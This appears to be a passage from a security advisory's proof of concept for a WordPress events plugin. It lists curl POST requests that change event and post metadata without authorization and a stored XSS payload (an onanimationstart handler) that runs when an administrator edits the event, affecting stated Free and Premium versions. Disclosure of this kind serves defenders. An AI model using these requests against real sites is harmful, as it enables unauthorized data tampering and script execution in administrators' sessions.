To set the Meeting URL to on the Virtual Event with ID 240:

curl -X POST --data "eid=240&values[_vir_url]=" ''

To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20:

curl -X POST --data "eid=20&values[my_meta]=attacker" ''

This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4

curl -X POST --data 'eid=240&values[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' ''

The XSS will be triggered when an admin will edit the event in the backend